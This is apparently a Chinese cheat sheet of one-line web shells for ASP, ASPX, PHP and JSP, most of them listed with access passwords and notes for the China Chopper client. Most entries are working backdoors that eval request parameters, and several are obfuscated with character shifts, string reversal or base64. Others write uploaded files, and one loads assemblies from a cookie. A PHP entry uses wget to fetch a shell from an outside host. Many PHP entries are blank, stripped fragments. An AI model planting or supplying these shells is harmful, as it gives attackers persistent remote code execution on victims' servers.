====================================================== || ASP一句话 || ====================================================== ---------------------------------------- <% re= request("sb") if re <>"" then execute re response.end end if %> ---------------------------------------- <%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%> ---------------------------------------- <% codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li" execute (decode (codeds) ) Function DeCode (Coded) On Error Resume Next For i = 1 To Len (Coded) Curchar = Mid (Coded, i, 1) If Asc (Curchar) = 16 then Curchar = chr (8) Elseif Asc (Curchar) = 24 then Curchar = chr (12) Elseif Asc (Curchar) = 32 then Curchar = chr (18) Else Curchar = chr (Asc (Curchar) -3) End if DeCode = Decode&Curchar Next End Function 'response.write(decode(codeds)) ' 菜刀连接 /hkmjj.asp?xx=x ,密码 hkmjj %> ---------------------------------------- <% dim x1,x2 x1 = request("pass") x2 = x1 eval x2 %> ---------------------------------------- <% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) End Function Execute MorfiCoder(")/*/z/*/(tseuqer lave") %> Password: z ---------------------------------------- <%a=request("cmd")%><%eval a%> ---------------------------------------- <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%> ---------------------------------------- <%execute(request("xiaoma"))%> ---------------------------------------- 1":eval request("a")' ---------------------------------------- "%><%eval request("a")%><%'" ---------------------------------------- <%Y=request("x")%> <%execute(Y)%> ---------------------------------------- <%eval request("xiaoma")%> ---------------------------------------- ┼癥污爠煥敵瑳∨≡┩愾 password: a ---------------------------------------- ====================================================== || ASPX一句话 || ====================================================== ---------------------------------------- <%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%> ---------------------------------------- <% @Page Language="Jscript"%><%eval(Request.Item["hucxsz"],"unsafe");%> ---------------------------------------- <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%> ---------------------------------------- <% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %> ---------------------------------------- Password: webadmin ---------------------------------------- ---------------------------------------- <% popup(popup(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); %> Password: z ---------------------------------------- <%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["xiaoma"],"unsafe"));%> ---------------------------------------- <%@ Page Language="C#" ValidateRequest="false" %> <%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["f4ck"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> ====================================================== || PHP一句话 || ====================================================== ---------------------------------------- ?JFIF  ---------------------------------------- ---------------------------------------- ---------------------------------------- ---------------------------------------- ---------------------------------------- ---------------------------------------- ---------------------------------------- Run eval(gzinflate(base64_decode('s7ezsS/IKFBwSC1LzNFQiQ/wDw6JVlcpL9a1CyrNU4/VtE7OyM1PUQBKBbsGhbkGRSsFOwd5BoTEu3n6uPo5+roqxeoYmJiYaFrbA40CAA=='))); ?> ---------------------------------------- ---------------------------------------- ---------------------------------------- ---------------------------------------- ---------------------------------------- ---------------------------------------- ---------------------------------------- ")?> ---------------------------------------- ---------------------------------------- ---------------------------------------- caidao: http://site/1.php?2=assert Password: 1 ---------------------------------------- ---------------------------------------- --------------------------------------- invokeArgs(array($_GET[c],$_GET[id])); ?> shell.php?m=file_put_contents&c=test.php&id= //写入一句话马 for linux shell.php?m=file_put_contents&c=test.php&id= //写入一句话马 for windows shell.php?m=system&c=echo ^ >test.php //在当前目录下面生成一句话马 for windows shell.php?m=system&c=wget http://xxx.xxx/igenus/images/suffix/test.php //当前目录下载一句话马 for linux ---------------------------------------- ---------------------------------------- caidao: h=@eval($_POST1); Password: sb ---------------------------------------- ---------------------------------------- //caidao: http://www.target.com/shell.php?ts7=assert ---------------------------------------- ---------------------------------------- ');?> ---------------------------------------- key=90sec or Url: http://www.target.com/90sec.php?key=90sec Password: shell ---------------------------------------- ====================================================== || JSP一句话 || ====================================================== ---------------------------------------- <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ----------------------------------------